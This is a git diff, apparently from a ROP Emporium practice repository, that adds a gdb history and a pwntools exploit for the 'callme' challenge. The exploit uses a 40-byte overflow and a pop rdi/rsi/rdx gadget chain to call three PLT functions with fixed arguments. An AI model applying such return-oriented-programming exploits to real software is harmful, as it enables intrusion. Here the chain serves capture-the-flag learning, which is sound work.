new file: x86_64/write4/exploit.py

	new file:   x86_64/write4/useful_gadgets

2 files changed, 67 insertions, 0 deletions

diff --git a/x86_64/callme/.gdb_history b/x86_64/callme/.gdb_history
new file mode 100644
index 0000000..451f131
--- /dev/null
+++ b/x86_64/callme/.gdb_history
@@ -0,0 +1,12 @@
+break pwnme
+run
+stepi
+return
+stepi
+nexti
+nexti
+q
+break pwnme
+run
+nexti
+quit
diff --git a/x86_64/callme/exploit2.py b/x86_64/callme/exploit2.py
new file mode 100755
index 0000000..b6d228f
--- /dev/null
+++ b/x86_64/callme/exploit2.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python3
+from pwn import *
+
+usefulGadgets = p64(0x000000000040093c)
+#   pop rdi
+#   pop rsi
+#   pop rdx
+#   ret
+
+arg1 = p64(0xdeadbeefdeadbeef)
+arg2 = p64(0xcafebabecafebabe)
+arg3 = p64(0xd00df00dd00df00d)
+
+callme_1_plt = p64(0x0000000000400720)
+callme_2_plt = p64(0x0000000000400740)
+callme_3_plt = p64(0x00000000004006f0)
+
+#jmp qword ptr [rbp]
+#jmp rax
+#jmp qword ptr [rax]
+#pop rbp ; ret
+
+#pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret <- change stack pointer to fin (or some other writable executable part)
+
+
+prog = process('./callme')
+payload = b''
+for c in range(40):
+    payload += b'a'
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_1_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_2_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_3_plt
+
+
+
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))